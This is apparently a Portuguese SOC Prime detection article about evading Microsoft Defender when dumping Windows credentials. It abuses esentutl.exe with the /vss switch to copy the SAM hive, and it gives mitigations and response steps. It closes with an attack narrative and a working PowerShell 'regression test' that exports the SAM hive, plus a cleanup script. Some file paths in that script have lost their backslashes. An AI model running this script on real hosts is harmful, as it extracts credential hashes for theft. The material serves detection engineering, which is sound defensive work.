SOC Prime Bias: Médio

28 Apr 2026 15:51 UTC

O Mês dos Bypasses: O Que o Defender Deixa Escapar

Author Photo
SOC Prime Team linkedin icon Seguir
O Mês dos Bypasses: O Que o Defender Deixa Escapar
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

A equipe de Segurança Persistente descreve uma nova maneira de contornar a detecção da técnica de despejo de credenciais T1003.002 ao explorar a utilidade assinada do Windows esentutl.exe. Usando flags relacionadas ao VSS, a ferramenta pode copiar os SAM and hives do REGISTRO sem acionar o Microsoft Defender da mesma forma que métodos de despejo mais comuns.

Investigação

Os pesquisadores testaram três abordagens tradicionais para despejar os hives, incluindo reg save, vssadmin criação de cópia sombra e cópia direta de arquivos, e descobriram que o Defender bloqueou cada uma delas. Eles então usaram testes variantes assistidos por IA para identificar um caminho alternativo: esentutl.exe poderia acessar e extrair os hives através de sua funcionalidade incorporada de VSS enquanto evitava as detecções existentes do Defender.

Mitigação

As defesas recomendadas incluem restringir esentutl.exe através do AppLocker ou WDAC, criar regras Sysmon para detectar executações esentutl que utilizam o /vss , e monitorar atividades de cópia sombra iniciadas fora do comportamento normal do sistema. As organizações também devem implantar o LAPS para contas de administrador local e desativar o VSS onde não seja operacionalmente necessário.

Resposta

If esentutl.exe é observado em execução com o /vss flag e escrevendo em arquivos associados a SAM or hives do REGISTRO, os defensores devem isolar o host afetado, coletar evidências de memória e registro, confirmar se o despejo de credenciais ocorreu, e aplicar os controles de política recomendados para prevenir recorrências.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O teste de pré-voo de Telemetria & Base de referência deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para ativar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa de Ataque e Comandos:
    Um adversário que obteve um acesso inicial em um host Windows comprometido deseja coletar hashes de credenciais sem acionar ferramentas típicas de despejo de credenciais que são comumente monitoradas. O invasor aproveita o binário embutido esentutl.exe com o /vss switch para criar uma cópia sombra do volume do sistema e extrair o hive SAM protegido. Os passos são:

    1. Crie um diretório temporário para a exportação do instantâneo.
    2. Invoque esentutl.exe com os flags /y (sobrescrever) e /vss , direcionando para o caminho do hive SAM.
    3. Copie o arquivo SAM exportado para um local sob o controle do invasor.
    4. (Opcional) Limpe o arquivo de instantâneo temporário para reduzir a pegada forense.

    Essa sequência produz um evento Sysmon ProcessCreate onde Imagem termina com esentutl.exe and Linha de Comando contém a string /vss, satisfazendo a regra de detecção.

  • Script de Teste de Regressão:

    # ----------------------------------------------
    # Simular extração de SAM baseada em VSS usando esentutl
    # ----------------------------------------------
    $tempDir = "$env:TEMPVSS_Export"
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
    
    # Caminho para o hive SAM (cópia somente leitura será exportada)
    $samHive = "$env:SystemRootSystem32configSAM"
    $outputFile = Join-Path $tempDir "SAM_copy.edb"
    
    # Execute esentutl com VSS para exportar o hive SAM
    $esentPath = "$env:SystemRootSystem32esentutl.exe"
    $arguments = "/y /vss `"$samHive`" `"$outputFile`""
    
    Write-Host "Executando: $esentPath $arguments"
    & $esentPath $arguments
    
    # Verifique se a exportação foi bem-sucedida
    if (Test-Path $outputFile) {
        Write-Host "Hive SAM exportado para $outputFile"
    } else {
        Write-Warning "Exportação falhou ou nenhum arquivo criado."
    }
    
    # Limpar arquivo de instantâneo (opcional, depende do comportamento do SO)
    # Nota: Arquivos de instantâneo do VSS são normalmente autoexcluídos após a exportação.
  • Comandos de Limpeza:

    # Remover diretório de exportação temporária e arquivos
    $tempDir = "$env:TEMPVSS_Export"
    if (Test-Path $tempDir) {
        Remove-Item -Recurse -Force -Path $tempDir
        Write-Host "Limpeza completa: $tempDir removido."
    } else {
        Write-Host "Nenhuma limpeza necessária; diretório não encontrado."
    }